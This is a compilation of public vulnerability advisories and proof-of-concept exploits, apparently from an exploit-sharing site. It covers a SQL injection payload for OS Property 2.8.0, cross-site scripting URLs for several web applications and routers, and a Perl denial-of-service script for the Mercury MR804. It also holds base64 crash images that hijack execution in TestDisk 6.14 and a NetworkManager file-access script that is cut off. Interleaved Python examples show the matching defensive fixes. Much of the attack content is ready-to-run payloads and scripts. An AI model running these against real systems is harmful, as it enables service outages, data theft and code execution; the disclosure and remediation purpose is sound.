
OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL
injection in the country_id parameter of the request that retrieves the
list of states for a given country. The version number was not bumped when
the vulnerability was fixed, but any copy downloaded after April 27th is
the fixed version.

http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property

http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html

Example URL:

http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31

Parameter: country_id (GET)
   Type: UNION query
   Title: MySQL UNION query (NULL) - 2 columns
   Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)#

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
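The advisory above shows the classic symptom: a value taken straight from the query string is spliced into the SQL text, so a closing quote followed by UNION changes the statement's shape. The following is an added example (not code from the advisory or from OS Property) that reproduces the two behaviours side by side on a constructed SQLite table: the interpolated query returns an extra attacker-chosen row, while the hardened lookup first requires an integer and then binds it as a parameter. The schema, the table contents and the probe string (adapted for SQLite, which has no CONCAT() and uses -- rather than # for comments) are all constructed for this demonstration.

```python
import sqlite3

# Constructed stand-in for the states table the endpoint queries
# (hypothetical schema, not OS Property's real one).
SCHEMA = """
CREATE TABLE states (id INTEGER PRIMARY KEY, country_id INTEGER, state_name TEXT);
INSERT INTO states VALUES (1, 31, 'Alpha'), (2, 31, 'Beta'), (3, 44, 'Gamma');
"""

# Probe in the shape of the advisory's payload, rewritten for SQLite: close the
# quoted literal, append a UNION with the same column count, comment out the rest.
PROBE = "31' UNION ALL SELECT NULL, 'injected-marker' -- "


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def states_vulnerable(conn, country_id):
    # String interpolation: the parameter becomes part of the SQL grammar,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT id, state_name FROM states WHERE country_id = '%s'" % country_id
    return conn.execute(sql).fetchall()


def states_safe(conn, country_id):
    # Fail closed on anything that is not an integer id, then bind the value
    # as a parameter so the database engine never parses it as SQL.
    try:
        cid = int(country_id)
    except (TypeError, ValueError):
        raise ValueError("country_id must be an integer")
    return conn.execute(
        "SELECT id, state_name FROM states WHERE country_id = ?", (cid,)
    ).fetchall()


def demo():
    """Run both lookups against the normal id and the probe; return what each did."""
    conn = open_db()
    normal_v = states_vulnerable(conn, "31")
    injected_v = states_vulnerable(conn, PROBE)
    normal_s = states_safe(conn, "31")
    try:
        states_safe(conn, PROBE)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "normal_rows": len(normal_v),
        "injected_rows_vulnerable": len(injected_v),
        "marker_leaked": any(r[1] == "injected-marker" for r in injected_v),
        "normal_rows_safe": len(normal_s),
        "probe_rejected_safe": rejected,
    }


if __name__ == "__main__":
    print(demo())
```

The integer check is the cheap first line; the parameter binding is the control that still holds for parameters that legitimately are strings, because bound values are sent to the engine as data rather than as text to be parsed.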
            
source: https://www.securityfocus.com/bid/52095/info

The Machine component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_machine&view=machine&Itemid=[SQL Injection]
http://www.example.com/index.php?option=com_machine&view=machine&Itemid=xxx&idMacchina=[SQL Injection] 
            
source: https://www.securityfocus.com/bid/52098/info
 
Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.
 
The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible.
 
http://www.example.com/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=www.example2.com&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply
            
source: https://www.securityfocus.com/bid/52098/info

Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.

The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible. 

http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
            
HireHackking
source: https://www.securityfocus.com/bid/52100/info

Dragonfly CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Dragonfly 9.3.3.0 is vulnerable; other versions may be affected.

http://www.example.com/index.php?name=coppermine&file=thumbnails&meta=lastup%22%3E%3CsCrIpT%3Ealert%2852128%29%3C%2fsCrIpT%3E&cat=0
HireHackking
source: https://www.securityfocus.com/bid/52106/info

Mercury MR804 router is prone to multiple denial-of-service vulnerabilities.

Remote attackers can exploit these issues to cause the device to crash, denying service to legitimate users.

Mercury MR804 running version 3.8.1 Build 101220 is vulnerable.

#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;

print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '*  writed by demonalex@163.com  *'."\n";
print '*********************************'."\n";

$evil='A'x4097;
$test_ip=shift;   #target ip
$test_port=shift; #target port

if(!defined($test_ip) || !defined($test_port)){
    die "usage : $0 target_ip target_port\n";
}

$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";

$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------
HireHackking

ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/52112/info

ContentLion Alpha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ContentLion Alpha 1.3 is vulnerable; other versions may also be affected.

http://www.example.com/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script>
HireHackking

Chyrp 2.1.1 - 'ajax.php' HTML Injection

source: https://www.securityfocus.com/bid/52115/info

Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Chyrp 2.1.1 is vulnerable; other versions may also be affected.

<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
<input type="hidden" name="field" value="" />
<input type="hidden" name="content" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
HireHackking

Oxwall 1.1.1 - 'plugin' Cross-Site Scripting

source: https://www.securityfocus.com/bid/52125/info

Oxwall is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Oxwall 1.1.1 and prior versions are vulnerable; other versions may also be affected.

http://www.example.com/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E
HireHackking

Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting

source: https://www.securityfocus.com/bid/52136/info

Mobile Mp3 Search Script is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

Mobile Mp3 Search Script 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/dl.php?url=http://www.google.it
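The dl.php handler above takes a URL from the request and emits it in a response header. Two distinct things can go wrong with that: a carriage return or line feed in the value ends the header line and lets the caller write further headers (the response splitting the advisory names), and an unrestricted host lets the page redirect anywhere (the open redirect the example URL illustrates). The following is an added example, not code from the script or the advisory, of the validation a redirect endpoint should apply before building a Location header. The allowlist hosts are constructed placeholders, and the check decodes the value first so that percent-encoded line breaks are caught as well as literal ones.

```python
from urllib.parse import unquote, urlsplit

# Constructed allowlist of hosts this download proxy may send clients to
# (hypothetical values, not the script's real configuration).
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}
ALLOWED_SCHEMES = {"http", "https"}

# Characters that can terminate a header line or the whole header block.
HEADER_BREAKING = ("\r", "\n", "\0")


def validate_redirect_target(raw_url):
    """Return the URL if it is safe to place in a Location header, else None."""
    url = unquote(raw_url)  # look at the value the client will actually receive
    # 1. Reject anything that can break out of the header line. This check runs
    #    before urlsplit(), which strips newlines and would hide them from us.
    if any(c in url for c in HEADER_BREAKING):
        return None
    # 2. Only absolute http(s) URLs: blocks javascript:, data:, and the
    #    scheme-relative //host form.
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    # 3. Exact host match against the allowlist (hostname is already lowercased
    #    and excludes any user:pass@ prefix, so www.example.com@evil fails here).
    if parts.hostname not in ALLOWED_HOSTS:
        return None
    return url


def build_redirect(raw_url):
    """Produce (status, headers) for the dl.php-style redirect; refuse rather than sanitize."""
    target = validate_redirect_target(raw_url)
    if target is None:
        return 400, []
    return 302, [("Location", target)]


if __name__ == "__main__":
    for candidate in ("http://www.google.it",
                      "http://www.example.com/track.mp3",
                      "http://www.example.com/a%0d%0aSet-Cookie:%20x=1"):
        print(candidate, "->", build_redirect(candidate))
```

Refusing the request outright is deliberate: stripping the offending characters and continuing would still leave the open-redirect behaviour in place, and a 400 is easy to alert on in access logs.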
HireHackking

TestDisk 6.14 - 'Check_OS2MB' Stack Buffer Overflow (PoC)

Security-Assessment.com presents..

TestDisk 6.14 Check_OS2MB Stack Buffer Overflow

Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX

PDF: http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf

+-----------+
|Description|
+-----------+

This document details a stack based buffer overflow vulnerability within TestDisk 6.14. A buffer overflow is triggered within the software when a malicious disk image is attempted to be recovered. This may be leveraged by an attacker to crash TestDisk and gain control of program execution. An attacker would have to coerce the victim to run TestDisk against their malicious image.

+------------+
|Exploitation|
+------------+

The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer overflow. This is due to the 512 byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being overflowed by a subsequent memcpy call in the cache_pread_aux method (hdcache.c, line 109). The third argument to the memcpy call (defining the amount of data to be copied) is controlled by the attacker; it is set in a header in the test case (offset 0xC in the test case below, set to 2048, or 0x0800).
The following GDB output shows the vulnerable memcpy call and the attacker controlled size argument (0x00000800):

Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0, buffer=0xbffff0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109
109       memcpy(buffer, cache->buffer + offset - cache->cache_offset, count);
(gdb) x/i $eip
=> 0x804e5c2 <cache_pread_aux+298>:     call   0x80499f0 <memcpy@plt>
(gdb) x/3x $esp
0xbffff010:     0xbffff0f0      0x080c3000      0x00000800

The following base64 data contains the test case which results in EIP control, in this case EIP being set to BEE5BEE5. The value EIP is overwritten with is at 0x20c.

6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU
ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg
ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5
IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW
1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA
AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA
AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA
AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA
AAAAAAAAKY9iYu3lvuW+NAsGCA0K

--[ Linux

Note that in the provided test case, 4 bytes at 0x210 have been set to a valid address within the TEXT segment of the TestDisk ELF file. This is due to GCC 4.7.2 compiling the Check_OS2MB method with the following assembly code:

0x08060a8d <+71>:    call   *%ecx
0x08060a8f <+73>:    mov    %eax,%edx
0x08060a91 <+75>:    mov    0x8(%ebp),%eax
0x08060a94 <+78>:    mov    0x194(%eax),%eax
0x08060a9a <+84>:    cmp    %eax,%edx
0x08060a9c <+86>:    je     0x8060ac5 <check_OS2MB+127>

The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled portion of memory into the EAX register and subsequently tries to read from that address ('mov 0x194(%eax)').
Thus, this has to be set to a legitimate address, otherwise TestDisk performs an out-of-bounds memory read before returning from the check_OS2MB method. As long as EDX and EAX do not match, the check_OS2MB method calls screen_buffer_add and log_redirect, then jumps to the end of the check_OS2MB method, successfully exploiting the stack overflow and gaining EIP control.

The precompiled version of TestDisk has been compiled with a stack protector. In order to exploit the precompiled version, an attacker would have to find a way to bypass GCC's '-fstack-protector' functionality.

--[ Windows

The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the precompiled version of TestDisk. This was tested on Windows 7 and 8.1.

--[ Mac OSX

An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14; however, the original test case needs to be padded. The value EIP is overwritten with is at 0x21C in the OSX test case. The base64 of the OSX crash test case is below. As in the above examples, EIP is overwritten with 0xBEE5BEE5.

6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU
ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg
ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5
IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW
1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA
AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA
AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA
AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA
AAAAAAAAKY9iYu0AAAAAAAAAAAAAAAAAAAAA5b7lvg==

+----------+
| Solution |
+----------+

Upgrade to TestDisk 7.0 or newer.

+-------------------+
|Disclosure Timeline|
+-------------------+

9/04/2015 - Advisory sent to Christophe Grenier.
9/04/2015 - Response from Christophe Grenier advising that a fix is ready for the development version. Christophe advised a new stable version will be available in 2 weeks.
18/04/2015 - TestDisk 7.0 Released.
30/04/2015 - Release of this document.

+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+

Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:
Web    www.security-assessment.com
Email  info () security-assessment com
Phone  +64 4 470 1650
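The root cause the advisory describes is a length that the image supplies and the reader trusts: the count handed to memcpy comes from the on-disk header while the destination is a fixed 512-byte stack buffer. The following is an added example, not TestDisk code, written in Python like the other examples on this page; it cannot reproduce the memory corruption itself, but it shows the bounds check that belongs between reading an untrusted length field and copying with it. The image layout is constructed for the demonstration: only the 16-bit little-endian field at the offset the advisory names (0xC) is meaningful, and the 2048 value mirrors the test case.

```python
import struct

# Size of the fixed stack buffer the advisory describes (fat.c, check_OS2MB).
SECTOR_BUFFER_SIZE = 512
# Offset of the attacker-controlled length field in the advisory's test case
# (0x0C, set there to 0x0800 = 2048).
SIZE_FIELD_OFFSET = 0x0C


def make_image(requested_size, total=4096):
    """Constructed stand-in for a disk image: zeros with the length field patched in."""
    img = bytearray(total)
    struct.pack_into("<H", img, SIZE_FIELD_OFFSET, requested_size)
    return bytes(img)


def read_requested_size(image):
    """The number of bytes the image asks the reader to copy; untrusted input."""
    return struct.unpack_from("<H", image, SIZE_FIELD_OFFSET)[0]


def bounded_copy(dst, src, count):
    """Copy count bytes of src into dst, failing closed when either side is too short.

    This is the check the memcpy in cache_pread_aux lacked: its count came
    straight from the image while the destination was a fixed 512-byte buffer.
    """
    if count > len(dst):
        raise ValueError("requested %d bytes, destination holds %d" % (count, len(dst)))
    if count > len(src):
        raise ValueError("requested %d bytes, source has only %d" % (count, len(src)))
    dst[:count] = src[:count]
    return count


def recover_sector(image):
    """Mimic the read path: take the image-supplied length, then copy into a 512-byte buffer."""
    count = read_requested_size(image)
    buffer = bytearray(SECTOR_BUFFER_SIZE)
    return bounded_copy(buffer, image, count)


def demo():
    """Return (bytes copied for a well-formed image, outcome for the 2048-byte request)."""
    benign = recover_sector(make_image(512))
    try:
        recover_sector(make_image(2048))
        hostile = "copied"
    except ValueError:
        hostile = "rejected"
    return benign, hostile


if __name__ == "__main__":
    print(demo())
```

The same idea applies when the destination is heap-allocated from another header field: compare the copy length against the size actually allocated, not against the size the header claims, and reject rather than clamp so that a malformed image is reported instead of silently truncated.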
HireHackking

Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/52170/info

Webglimpse is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.

Webglimpse versions 2.18.8 and prior are affected.

http://www.example.com/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
http://www.example.com/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T
HireHackking

GNOME NetworkManager 0.x - Local Arbitrary File Access

source: https://www.securityfocus.com/bid/52206/info

GNOME NetworkManager is prone to a local arbitrary file-access vulnerability.

Local attackers can exploit this issue to read arbitrary files. This may lead to further attacks.

NetworkManager 0.6, 0.7, and 0.9 are vulnerable; other versions may also be affected.

#!/usr/bin/python
#
# Copyright (C) 2011 SUSE LINUX Products GmbH
#
# Author: Ludwig Nussel
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 2 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

import gobject
import dbus
import dbus.service
import dbus.mainloop.glib
import os
import subprocess
import sys  # needed by addcon() for sys.exit(); missing in the original

def N_(x): return x

_debug_level = 0

def debug(level, msg):
    if (level <= _debug_level):
        print '<%d>'%level, msg

class NetworkManager(gobject.GObject):

    NM_STATE = {
        0: 'UNKNOWN',
        10: 'UNMANAGED',
        20: 'UNAVAILABLE',
        30: 'DISCONNECTED',
        40: 'PREPARE',
        50: 'CONFIG',
        60: 'NEED_AUTH',
        70: 'IP_CONFIG',
        80: 'IP_CHECK',
        90: 'SECONDARIES',
        100: 'ACTIVATED',
        110: 'DEACTIVATING',
        120: 'FAILED',
    }

    NM_DEVICE_TYPE = {
        0: 'NM_DEVICE_TYPE_UNKNOWN',    # The device type is unknown.
        1: 'NM_DEVICE_TYPE_ETHERNET',   # The device is wired Ethernet device.
        2: 'NM_DEVICE_TYPE_WIFI',       # The device is an 802.11 WiFi device.
        3: 'NM_DEVICE_TYPE_UNUSED1',    # Unused
        4: 'NM_DEVICE_TYPE_UNUSED2',    # Unused
        5: 'NM_DEVICE_TYPE_BT',         # The device is Bluetooth device that provides PAN or DUN capabilities.
        6: 'NM_DEVICE_TYPE_OLPC_MESH',  # The device is an OLPC mesh networking device.
        7: 'NM_DEVICE_TYPE_WIMAX',      # The device is an 802.16e Mobile WiMAX device.
        8: 'NM_DEVICE_TYPE_MODEM',      # The device is a modem supporting one or more of analog telephone, CDMA/EVDO, GSM/UMTS/HSPA, or LTE standards to access a cellular or wireline data network.
    }

    NM_802_11_AP_SEC = {
        'NM_802_11_AP_SEC_NONE': 0x0,              # Null flag.
        'NM_802_11_AP_SEC_PAIR_WEP40': 0x1,        # Access point supports pairwise 40-bit WEP encryption.
        'NM_802_11_AP_SEC_PAIR_WEP104': 0x2,       # Access point supports pairwise 104-bit WEP encryption.
        'NM_802_11_AP_SEC_PAIR_TKIP': 0x4,         # Access point supports pairwise TKIP encryption.
        'NM_802_11_AP_SEC_PAIR_CCMP': 0x8,         # Access point supports pairwise CCMP encryption.
        'NM_802_11_AP_SEC_GROUP_WEP40': 0x10,      # Access point supports a group 40-bit WEP cipher.
        'NM_802_11_AP_SEC_GROUP_WEP104': 0x20,     # Access point supports a group 104-bit WEP cipher.
        'NM_802_11_AP_SEC_GROUP_TKIP': 0x40,       # Access point supports a group TKIP cipher.
        'NM_802_11_AP_SEC_GROUP_CCMP': 0x80,       # Access point supports a group CCMP cipher.
        'NM_802_11_AP_SEC_KEY_MGMT_PSK': 0x100,    # Access point supports PSK key management.
        'NM_802_11_AP_SEC_KEY_MGMT_802_1X': 0x200, # Access point supports 802.1x key management.
    }

    def __init__(self):
        self.bus = dbus.SystemBus()
        self.proxy = None
        self.manager = None
        self.running = False
        self.devices = {}
        self.devices_by_name = {}
        self.aps = {}
        self.ap_by_addr = {}
        self.ap_by_ssid = {}

        self.check_status()

        self.bus.add_signal_receiver(
            lambda name, old, new: self.nameowner_changed_handler(name, old, new),
            bus_name='org.freedesktop.DBus',
            dbus_interface='org.freedesktop.DBus',
            signal_name='NameOwnerChanged')

        self.bus.add_signal_receiver(
            lambda device, **kwargs: self.device_add_rm(device, True, **kwargs),
            bus_name='org.freedesktop.NetworkManager',
            dbus_interface = 'org.freedesktop.NetworkManager',
            signal_name = 'DeviceAdded',
            sender_keyword = 'sender')

        self.bus.add_signal_receiver(
            lambda device, **kwargs: self.device_add_rm(device, False, **kwargs),
            bus_name='org.freedesktop.NetworkManager',
            dbus_interface = 'org.freedesktop.NetworkManager',
            signal_name = 'DeviceRemoved',
            sender_keyword = 'sender')

    def cleanup(self):
        self.switcher = None

    def devstate2name(self, state):
        if state in self.NM_STATE:
            return self.NM_STATE[state]
        return "UNKNOWN:%s"%state

    def devtype2name(self, type):
        if type in self.NM_DEVICE_TYPE:
            return self.NM_DEVICE_TYPE[type]
        return "UNKNOWN:%s"%type

    def secflags2str(self, flags):
        a = []
        for key in self.NM_802_11_AP_SEC.keys():
            if self.NM_802_11_AP_SEC[key] and flags&self.NM_802_11_AP_SEC[key]:
                a.append(key[len('NM_802_11_AP_SEC_'):])
        return ' '.join(a)

    def nameowner_changed_handler(self, name, old, new):
        if name != 'org.freedesktop.NetworkManager':
            return
        off = old and not new
        self.check_status(off)

    def device_add_rm(self, device, added, sender=None, **kwargs):
        if (added):
            dev = self.bus.get_object("org.freedesktop.NetworkManager", device)
            props = dbus.Interface(dev, "org.freedesktop.DBus.Properties")
            name = props.Get("org.freedesktop.NetworkManager.Device", "Interface")
            devtype = props.Get("org.freedesktop.NetworkManager.Device", "DeviceType")
            debug(0,"device %s, %s added"%(name, self.devtype2name(devtype)))
            self.devices[device] = name
            self.devices_by_name[name] = device
            if devtype == 2:
                wifi = dbus.Interface(dev, "org.freedesktop.NetworkManager.Device.Wireless")
                aps = wifi.GetAccessPoints()
                for path in aps:
                    ap = self.bus.get_object("org.freedesktop.NetworkManager", path)
                    props = dbus.Interface(ap, "org.freedesktop.DBus.Properties")
                    ssid_raw = props.Get("org.freedesktop.NetworkManager.AccessPoint", "Ssid")
                    addr = props.Get("org.freedesktop.NetworkManager.AccessPoint", "HwAddress")
                    wpaflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "WpaFlags")
                    rsnflags = props.Get("org.freedesktop.NetworkManager.AccessPoint", "RsnFlags")
                    # build a printable SSID: printable bytes as characters, the rest as hex
                    ssid = ''
                    for b in ssid_raw:
                        if b > 20 and b < 126:
                            ssid += chr(b)
                        else:
                            ssid += '0x%02x'%b
                    self.aps[path] = {
                        'Ssid' : ssid_raw,
                        '_ssid_readable' : ssid,
                        'HwAddress' : addr,
                        'WpaFlags' : wpaflags,
                        'RsnFlags' : rsnflags,
                    }
                    self.ap_by_addr[addr] = path
                    if not ssid in self.ap_by_ssid:
                        self.ap_by_ssid[ssid] = set({})
                    self.ap_by_ssid[ssid].add(path)

                for ssid in sorted(self.ap_by_ssid.keys()):
                    print ssid
                    for path in self.ap_by_ssid[ssid]:
                        ap = self.aps[path]
                        print '  ', ap['HwAddress']
                        if ap['WpaFlags']:
                            print "    WPA: ", self.secflags2str(ap['WpaFlags'])
                        if ap['RsnFlags']:
                            print "    RSN: ", self.secflags2str(ap['RsnFlags'])
        else:
            if not device in self.devices:
                debug(0, "got remove signal for unknown device %s removed"%device)
            else:
                name = self.devices[device]
                del self.devices[device]
                del self.devices_by_name[name]
                debug(0,"device %s removed"%name)

    def _connect_nm(self):
        try:
            self.proxy = self.bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager")
            self.manager = manager = dbus.Interface(self.proxy, "org.freedesktop.NetworkManager")
            running = True
        except dbus.DBusException, e:
            running = False
            print e
        return running

    def check_status(self, force_off=False):
        if (force_off):
            running = False
        else:
            running = self.running
            if (not self.manager):
                running = self._connect_nm()

        if (running):
            if (not self.running):
                devices = self.manager.GetDevices()
                for d in devices:
                    self.device_add_rm(d, True)

        if (not running):
            self.proxy = self.manager = None

        self.running = running
        debug(1,"NM Running: %s"%self.running)

    def addcon(self, params, device, ap = '/'):
        if device[0] != '/':
            if not device in self.devices_by_name:
                print "Error: device not known"
                sys.exit(1)
            device = self.devices_by_name[device]

        if ap[0] != '/' and not 'ssid' in params['802-11-wireless']:
            params['802-11-wireless']['ssid'] = [dbus.Byte(ord(c)) for c in ap]
            if not ap in self.ap_by_ssid:
                print "Warning: ssid not known"
            ap = '/'
        else:
            ap = '/'

        # AddAndActivateConnection makes NetworkManager (running as root) open the
        # file:// paths given in the 802-1x settings on the caller's behalf.
        self.manager.AddAndActivateConnection(params, device, ap)

if __name__ == '__main__':
    from optparse import OptionParser

    parser = OptionParser(usage="%prog [options]")
    parser.add_option('--debug', dest="debug", metavar='N', action='store', type='int', default=0, help="debug level")
    (opts, args) = parser.parse_args()

    if opts.debug:
        _debug_level = opts.debug

